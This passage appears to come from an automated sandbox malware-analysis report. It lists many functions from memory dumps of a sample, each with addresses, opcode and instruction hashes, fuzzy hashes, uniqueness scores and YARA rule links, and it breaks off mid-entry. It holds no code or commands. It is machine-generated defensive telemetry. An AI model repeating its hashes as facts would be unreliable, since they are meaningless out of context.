                                                  • Opcode ID: 522ad0819d63d9859084ae9efdf585d81a349adbd52f2bbe53e0fdbf0b694634
                                                  • Instruction ID: 711b7d5fa136623587763069d634fcd7b84367151a992e45097dd0b043492238
                                                  • Opcode Fuzzy Hash: 522ad0819d63d9859084ae9efdf585d81a349adbd52f2bbe53e0fdbf0b694634
                                                  • Instruction Fuzzy Hash: BCF05E353106048BDA18F7B9C850B6A37EAABC5956F08046DDA46DB764DEB4EC028791
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 06EAAE20 Relevance: .0, Instructions: 35COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1585780879.0000000006EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_6ea0000_20240328-REV2.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ed3bcf447d3a743272e916ce49b10726eabb321305ffef132eb2ca4e0356ec2d
                                                  • Instruction ID: d89ec5c7c238ee7c57ee60f50a64256b3cb75945a4661d4d988e17aaa50c65e8
                                                  • Opcode Fuzzy Hash: ed3bcf447d3a743272e916ce49b10726eabb321305ffef132eb2ca4e0356ec2d
                                                  • Instruction Fuzzy Hash: 2E01A5B4D042599FCB40DFA8C4856AEBFF8FB08301F1085A9E954E7340D734AA81DFA0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 06EAA2F8 Relevance: .0, Instructions: 34COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1585780879.0000000006EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_6ea0000_20240328-REV2.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b3ab62ce0c60cac0888d5ea56a46bed6307d206ed478996afd82d8d2758248c1
                                                  • Instruction ID: 8f4300b8607f73ab1b54cb9ddeb3a53678c4d6d5eaa9ddf706046ceb32b760bd
                                                  • Opcode Fuzzy Hash: b3ab62ce0c60cac0888d5ea56a46bed6307d206ed478996afd82d8d2758248c1
                                                  • Instruction Fuzzy Hash: EF01B675E00208EFDB04DFA9C599A9DBFF5EF88310F05C0A5A4089B361DA34E940DF40
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 06EAFC88 Relevance: .0, Instructions: 33COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1585780879.0000000006EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_6ea0000_20240328-REV2.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 24380bdb75b6c83fada3e7f129146ddd6a630d00cfab27a0de3ef3982f999882
                                                  • Instruction ID: db9f6dc6c81a0b43a2793c7adc73c04f10585c65aeefebbcde09d102f150866a
                                                  • Opcode Fuzzy Hash: 24380bdb75b6c83fada3e7f129146ddd6a630d00cfab27a0de3ef3982f999882
                                                  • Instruction Fuzzy Hash: 2BF01D71D0421AEFCF40EF99D8019EFBBB9FF89324F048519E914AB210D732A516CB90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 08958B90 Relevance: .0, Instructions: 30COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1587080933.0000000008950000.00000040.00000800.00020000.00000000.sdmp, Offset: 08950000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_8950000_20240328-REV2.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e4904804302695f50607f5ac5fdbf20382cc9a0833931ae78634263f0a18ba23
                                                  • Instruction ID: dd0a81ce3487be0b2e4e5793851bddd753745cd1eb6cbd0fd339f1b22cf23572
                                                  • Opcode Fuzzy Hash: e4904804302695f50607f5ac5fdbf20382cc9a0833931ae78634263f0a18ba23
                                                  • Instruction Fuzzy Hash: 33F044B1D1421B8FCF40EFA8C8025EEBBB1BF85301F11486AD518FB010E730228A8B80
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 089570B7 Relevance: .0, Instructions: 30COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1587080933.0000000008950000.00000040.00000800.00020000.00000000.sdmp, Offset: 08950000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_8950000_20240328-REV2.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a245e839fddf1ba0455b23093e76cabfd8a9a96739dda72b6b25e641d7e667aa
                                                  • Instruction ID: f555bd79b214ddf5316d18fbddd15f4fd548443b3df29a690f8e9b40876298f6
                                                  • Opcode Fuzzy Hash: a245e839fddf1ba0455b23093e76cabfd8a9a96739dda72b6b25e641d7e667aa
                                                  • Instruction Fuzzy Hash: 99F0593321428AEBDF12DEA48C009DC3FA4DF02239F044257F9E1DA092C3799266D752
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0895C93F Relevance: .0, Instructions: 29COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1587080933.0000000008950000.00000040.00000800.00020000.00000000.sdmp, Offset: 08950000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_8950000_20240328-REV2.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a24ca336e0a8652409ac97e45fb3572a362b7c84c062b80e0dcd6efb38aacd45
                                                  • Instruction ID: 489ad1a0ff749aa6f897a32f591ed855ce3ecd276f48bad9fdc00bd31b3d774c
                                                  • Opcode Fuzzy Hash: a24ca336e0a8652409ac97e45fb3572a362b7c84c062b80e0dcd6efb38aacd45
                                                  • Instruction Fuzzy Hash: 52F05874D0A248EFC751EFA8D454298FFF4EF4A204F10C1EAD89897341D6314A02CF41
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 08958A60 Relevance: .0, Instructions: 29COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1587080933.0000000008950000.00000040.00000800.00020000.00000000.sdmp, Offset: 08950000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_8950000_20240328-REV2.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 6cea5b6b0f11852afafc9277160a2eefac964236e345543f4c66390fa9c97ec4
                                                  • Instruction ID: 4ab76393d0d78d895a1d31300261d5d732e2fbf3f9de8f51665684866f1e2f11
                                                  • Opcode Fuzzy Hash: 6cea5b6b0f11852afafc9277160a2eefac964236e345543f4c66390fa9c97ec4
                                                  • Instruction Fuzzy Hash: 5CF0B7B4D08209EFCB44DFA9D9456AEBBF4FB48301F1085AAE819B3350EB305A41CF91
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0895BB20 Relevance: .0, Instructions: 29COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1587080933.0000000008950000.00000040.00000800.00020000.00000000.sdmp, Offset: 08950000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_8950000_20240328-REV2.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 65500994ce026a137fe86e100f316ec32c75cc58341442379c096efe3bcb87be
                                                  • Instruction ID: 9fc1c20bea67d2094088918fce98708c936501c5aa2734968ac2707601303ba1
                                                  • Opcode Fuzzy Hash: 65500994ce026a137fe86e100f316ec32c75cc58341442379c096efe3bcb87be
                                                  • Instruction Fuzzy Hash: 11F05E74D09288AFC742DFA8D44159CBFB4EF46211F1480EAC858DB392D7758945CB82
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 089570C8 Relevance: .0, Instructions: 28COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1587080933.0000000008950000.00000040.00000800.00020000.00000000.sdmp, Offset: 08950000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_8950000_20240328-REV2.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 2d50237e84e06884b9f2cba989d746a7a16f05bd67d7f97e9fea4f7272327df9
                                                  • Instruction ID: 2969b183b4c8947d9d50432ab87712de1caa7a66edc022b359f534e00b6d1e2c
                                                  • Opcode Fuzzy Hash: 2d50237e84e06884b9f2cba989d746a7a16f05bd67d7f97e9fea4f7272327df9
                                                  • Instruction Fuzzy Hash: 13F0653261021DFB5F10EE988C015DD37A8EF0923AF148526FDA5D6140D375E6609BA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 08955AA0 Relevance: .0, Instructions: 27COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1587080933.0000000008950000.00000040.00000800.00020000.00000000.sdmp, Offset: 08950000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_8950000_20240328-REV2.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 90d5ad94065e7e3a011ae3c9201eac4323184f1a44fe699388ab33591f0e3c9f
                                                  • Instruction ID: 0ec714bee49d494fc4299c15e079be448b9c4c7faebcb8cd148e6addbca33318
                                                  • Opcode Fuzzy Hash: 90d5ad94065e7e3a011ae3c9201eac4323184f1a44fe699388ab33591f0e3c9f
                                                  • Instruction Fuzzy Hash: 07E086313401105B8318B65ED8D497E7BDAEBC9626751847AF50DD7311CE219C065355
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0895BAD8 Relevance: .0, Instructions: 27COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1587080933.0000000008950000.00000040.00000800.00020000.00000000.sdmp, Offset: 08950000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_8950000_20240328-REV2.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 691f8c1fe5f8bd7de9d5e0876c1ce21c970209629df470969bcbb25b2a3cfe80
                                                  • Instruction ID: 128021d97bd8d5c139d0fe760178d12851ba2c33c1c09ddc694d073f50f98a03
                                                  • Opcode Fuzzy Hash: 691f8c1fe5f8bd7de9d5e0876c1ce21c970209629df470969bcbb25b2a3cfe80
                                                  • Instruction Fuzzy Hash: 1FE0ED7050A2989FC703EFB494015AA3FF8DF47206F1405EAD440CB1A2D63189048782
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0895F302 Relevance: .0, Instructions: 27COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1587080933.0000000008950000.00000040.00000800.00020000.00000000.sdmp, Offset: 08950000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_8950000_20240328-REV2.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e2fd9256d1eaa0f7c17360cef86e4861b66090e67edb2cbc232e355697dddaa5
                                                  • Instruction ID: c949f8c86709b42658a30b64dd201a50947b3e24cd58212fa77fe5e35f47e4f8
                                                  • Opcode Fuzzy Hash: e2fd9256d1eaa0f7c17360cef86e4861b66090e67edb2cbc232e355697dddaa5
                                                  • Instruction Fuzzy Hash: 29F0D4B4E16218DFDB04EFA5E9445ADB7F6BF88311F60942AE805A7254EB348901CB00
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 08958468 Relevance: .0, Instructions: 26COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1587080933.0000000008950000.00000040.00000800.00020000.00000000.sdmp, Offset: 08950000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_8950000_20240328-REV2.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e8d1f0078b3fd5f7c59b63d9deb6f2da51a8d115594380d4d029c51c86b1b429
                                                  • Instruction ID: db9558cb7f9da7c02a37d1543a1cd3fe6752d3efb3ce276ff6630b46d5dfcf8f
                                                  • Opcode Fuzzy Hash: e8d1f0078b3fd5f7c59b63d9deb6f2da51a8d115594380d4d029c51c86b1b429
                                                  • Instruction Fuzzy Hash: DCE0D8353491914FC306936CE86455C7FA69FCA27171640FAD14CCF363CE114C068795
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0895B830 Relevance: .0, Instructions: 25COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1587080933.0000000008950000.00000040.00000800.00020000.00000000.sdmp, Offset: 08950000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_8950000_20240328-REV2.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 5e5943533b5b43d8c38b07b331eaae2b315b9ed509f481f3e86153b566828143
                                                  • Instruction ID: 66d80276882df661d18a774db8eaa30eacb0b10ef2ea5c8aa3db5f14c0f04ac7
                                                  • Opcode Fuzzy Hash: 5e5943533b5b43d8c38b07b331eaae2b315b9ed509f481f3e86153b566828143
                                                  • Instruction Fuzzy Hash: FDF0E53090D244BFCB02DBA8D4514ACBF70EF07311F1481EED8049F292C7314956C782
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 06EA6688 Relevance: .0, Instructions: 23COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1585780879.0000000006EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_6ea0000_20240328-REV2.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 970508921de0b66fc67540c6744a05a76bc9338243a572aa3d81c8639b2901cd
                                                  • Instruction ID: 6543e9bc52a582ffd39fd027247c0a10df6db33ae89efe1b7c5dda08730307b6
                                                  • Opcode Fuzzy Hash: 970508921de0b66fc67540c6744a05a76bc9338243a572aa3d81c8639b2901cd
                                                  • Instruction Fuzzy Hash: F8F0C975D04208FFCB44DF98D841AADBBB9EB89314F14C1A9EC185B350D632AA51DF80
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0895C950 Relevance: .0, Instructions: 22COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1587080933.0000000008950000.00000040.00000800.00020000.00000000.sdmp, Offset: 08950000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_8950000_20240328-REV2.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 7dd1ddba78b560982898321530a8f49f6e76de239658f53fcae9509715830521
                                                  • Instruction ID: 1c5de09a908c6a2bbe2e8494d629b2f6a07076c3222ba5e7871853e0a3a8a097
                                                  • Opcode Fuzzy Hash: 7dd1ddba78b560982898321530a8f49f6e76de239658f53fcae9509715830521
                                                  • Instruction Fuzzy Hash: AEE0E574E05208EFCB84EFA8D4516ACFBF8EB4A305F10C1A99818A7340D6319A42CF40
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0895BB30 Relevance: .0, Instructions: 22COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1587080933.0000000008950000.00000040.00000800.00020000.00000000.sdmp, Offset: 08950000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_8950000_20240328-REV2.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 7dd1ddba78b560982898321530a8f49f6e76de239658f53fcae9509715830521
                                                  • Instruction ID: c4819ac96e30ad02f34fcc6c62261b8d2a6b2cb2f74fc43462a6e2062e043c39
                                                  • Opcode Fuzzy Hash: 7dd1ddba78b560982898321530a8f49f6e76de239658f53fcae9509715830521
                                                  • Instruction Fuzzy Hash: 92E0E574E05208EFCB84EFA8D4416ACFBF8EB89315F10C1A9981897340E7719A02CF41
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 08952F00 Relevance: .0, Instructions: 22COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1587080933.0000000008950000.00000040.00000800.00020000.00000000.sdmp, Offset: 08950000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_8950000_20240328-REV2.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 4def1677bc02a81a394c74cc4c5e5642433e62e75f2626629b2b58babc036d01
                                                  • Instruction ID: c8a7d9f9119ab0f7ec96dbd49e564af0182af7572374c262c48741a66daf1b13
                                                  • Opcode Fuzzy Hash: 4def1677bc02a81a394c74cc4c5e5642433e62e75f2626629b2b58babc036d01
                                                  • Instruction Fuzzy Hash: 4AE01A3050A3849FC716DB6999195007F649F4322AB2946EEDC948B2B7D232E81BCB92
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0895A398 Relevance: .0, Instructions: 22COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1587080933.0000000008950000.00000040.00000800.00020000.00000000.sdmp, Offset: 08950000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_8950000_20240328-REV2.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 94b264fb9242477e37f5d983a50dce538199b617606bb0bcf93212eb2c26d91c
                                                  • Instruction ID: 493421c3cae8ae029bc5f46a30fa83c0df07eda562626ff55e41d450437e9d2e
                                                  • Opcode Fuzzy Hash: 94b264fb9242477e37f5d983a50dce538199b617606bb0bcf93212eb2c26d91c
                                                  • Instruction Fuzzy Hash: 81E0D871515214DFC700EBA0D511A5A7BF8EF4E206F1059A5A4448B010EA304D00DB81
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 06EA68C8 Relevance: .0, Instructions: 22COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1585780879.0000000006EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_6ea0000_20240328-REV2.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ede38e36a69fe2260818a0b162e2db11f13d264695d8138c9b109e1cf9796d3d
                                                  • Instruction ID: 949ea510c0eccb833c839d658965fa74f22d305f9a30ee51f53a9716118ecd30
                                                  • Opcode Fuzzy Hash: ede38e36a69fe2260818a0b162e2db11f13d264695d8138c9b109e1cf9796d3d
                                                  • Instruction Fuzzy Hash: B3E0E5B4E04308EFCB84DFA9D4516ACFBF8EB4A304F14C1A998189B340D631AA02DF80
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0895BAE8 Relevance: .0, Instructions: 20COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1587080933.0000000008950000.00000040.00000800.00020000.00000000.sdmp, Offset: 08950000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_8950000_20240328-REV2.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: c6b4856173e035621405f1ee9c0406d433ac9aae9c068cef63c91e58db3d0d11
                                                  • Instruction ID: fa01538d620acdf607fb29d57e3c73a05f4f836870b0d58cdbfea138e042df21
                                                  • Opcode Fuzzy Hash: c6b4856173e035621405f1ee9c0406d433ac9aae9c068cef63c91e58db3d0d11
                                                  • Instruction Fuzzy Hash: 67E012B580624CEFC700FFA58401AAA7BFCDF8A216F4045A5D90597150EA725A549B91
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 08959F10 Relevance: .0, Instructions: 20COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1587080933.0000000008950000.00000040.00000800.00020000.00000000.sdmp, Offset: 08950000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_8950000_20240328-REV2.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 248add142da7310a49f997271e2f3ccc3a777b62ffb88191043cafb3d1624f87
                                                  • Instruction ID: 75502c060f3775fea8fa1d39bf2b406026f2088270bf9bd3dc00c20be140233c
                                                  • Opcode Fuzzy Hash: 248add142da7310a49f997271e2f3ccc3a777b62ffb88191043cafb3d1624f87
                                                  • Instruction Fuzzy Hash: FCE0C232B04054CFCB20CF14E804ADCF7B8DB58302F008566E40ADB102DB3585168F10
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0895A3A8 Relevance: .0, Instructions: 20COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1587080933.0000000008950000.00000040.00000800.00020000.00000000.sdmp, Offset: 08950000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_8950000_20240328-REV2.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e82241198d6eeddc60723cbf369eda0ec635899d62b830b98e81dd5d39f9054e
                                                  • Instruction ID: e5997a5584979bc36ce065bc82f8eba1b2865e14dd6c99a62322dc35ce7d08b5
                                                  • Opcode Fuzzy Hash: e82241198d6eeddc60723cbf369eda0ec635899d62b830b98e81dd5d39f9054e
                                                  • Instruction Fuzzy Hash: 0EE01271909218EFD700EFA4D51669EBBFDEB4A206F005AA5A5499B110FE314E009B95
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0895B840 Relevance: .0, Instructions: 19COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1587080933.0000000008950000.00000040.00000800.00020000.00000000.sdmp, Offset: 08950000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_8950000_20240328-REV2.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 170ba1ff578cff43dffda045faba17bb0357f195be7a50c8d79f95bd0c7133d6
                                                  • Instruction ID: 5ace65fa4014719249c422cf6e9e91a14002b8be13219b4aad88f42922ebcdb1
                                                  • Opcode Fuzzy Hash: 170ba1ff578cff43dffda045faba17bb0357f195be7a50c8d79f95bd0c7133d6
                                                  • Instruction Fuzzy Hash: BCE0EC74909208EBCB04EB94D55296DBBB8EB46315F1091EDDC181B381DB325E42DB81
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0895EB56 Relevance: .0, Instructions: 14COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1587080933.0000000008950000.00000040.00000800.00020000.00000000.sdmp, Offset: 08950000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_8950000_20240328-REV2.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ae724905daf151cbbc7b425ff55d6b7b0e74752c02ecfa10a06031d5fc6c3e23
                                                  • Instruction ID: 58a0b77f4258ecad1e590a0136dee5122ad7c63bca483e0dac709acaa890b3f9
                                                  • Opcode Fuzzy Hash: ae724905daf151cbbc7b425ff55d6b7b0e74752c02ecfa10a06031d5fc6c3e23
                                                  • Instruction Fuzzy Hash: EAD05231A02218CFCB10DB88EC40BECBBB8FBC9222F0042E2C40CA2214D3302A80CF20
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 08959F74 Relevance: .0, Instructions: 13COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1587080933.0000000008950000.00000040.00000800.00020000.00000000.sdmp, Offset: 08950000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_8950000_20240328-REV2.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 5691910bc6c0cb471310e8dfe2ab4ca15412b640b362f44b23fe7782daa6e00b
                                                  • Instruction ID: 0a28acde029746a378467150cc82671a123f55fc3f6ef66ed998c9f419ba4f90
                                                  • Opcode Fuzzy Hash: 5691910bc6c0cb471310e8dfe2ab4ca15412b640b362f44b23fe7782daa6e00b
                                                  • Instruction Fuzzy Hash: FFE0E238A0421A8FCB20EF28E4427A9BBB5FB48300F0041A9E409A7706E7306E418F80
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 06EA6ED8 Relevance: .0, Instructions: 13COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1585780879.0000000006EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_6ea0000_20240328-REV2.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 4eba574e5ee9b55e2b432f991b557ef0d68bba87bd23c082f87660f660efdec6
                                                  • Instruction ID: 18b7cd7d9fa63072407bd1586143598698030d876e3fa545e395dbf155474c34
                                                  • Opcode Fuzzy Hash: 4eba574e5ee9b55e2b432f991b557ef0d68bba87bd23c082f87660f660efdec6
                                                  • Instruction Fuzzy Hash: 7AC08071814308ABC350DFB9D8097197BACD707355F444454F408C7140DF715550C665
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0895A105 Relevance: .0, Instructions: 12COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1587080933.0000000008950000.00000040.00000800.00020000.00000000.sdmp, Offset: 08950000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_8950000_20240328-REV2.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: d3df88673862557b8a49f92dc070d335783d38eb331b780ba627d5370c58e0cb
                                                  • Instruction ID: 3b16e8928c92c15c4bd8b863a597b83211b85a8c971bdc64be7ce4f41a82d135
                                                  • Opcode Fuzzy Hash: d3df88673862557b8a49f92dc070d335783d38eb331b780ba627d5370c58e0cb
                                                  • Instruction Fuzzy Hash: 45E0E278905219CBEB50CF60DD44BACBBB4FB08300F008295D80EAB380DA304A85CF10
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 08959E33 Relevance: .0, Instructions: 11COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1587080933.0000000008950000.00000040.00000800.00020000.00000000.sdmp, Offset: 08950000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_8950000_20240328-REV2.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: f8d61f87774fb8aeda9971e2c4e67223f1eca52a874cfdbf23e810bd770c29b0
                                                  • Instruction ID: 4431a2a80313b61000ec29db224139f3f0e1b319e02fc45ca652d7037c5d552a
                                                  • Opcode Fuzzy Hash: f8d61f87774fb8aeda9971e2c4e67223f1eca52a874cfdbf23e810bd770c29b0
                                                  • Instruction Fuzzy Hash: 99D09E74918198CBCB40DF90D5555ACBFB8FB09302F109855D40FAA244CA351D84CF00
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0895E828 Relevance: .0, Instructions: 10COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1587080933.0000000008950000.00000040.00000800.00020000.00000000.sdmp, Offset: 08950000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_8950000_20240328-REV2.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 4ab8b1b5fd4a6f4729bc247b24a0a17d4e85d0da40f617fee0caa36cedc046ea
                                                  • Instruction ID: 36142bbda40b9ca71327d8bb0814098b52b0065a1d3fd838edbe85579226eb9f
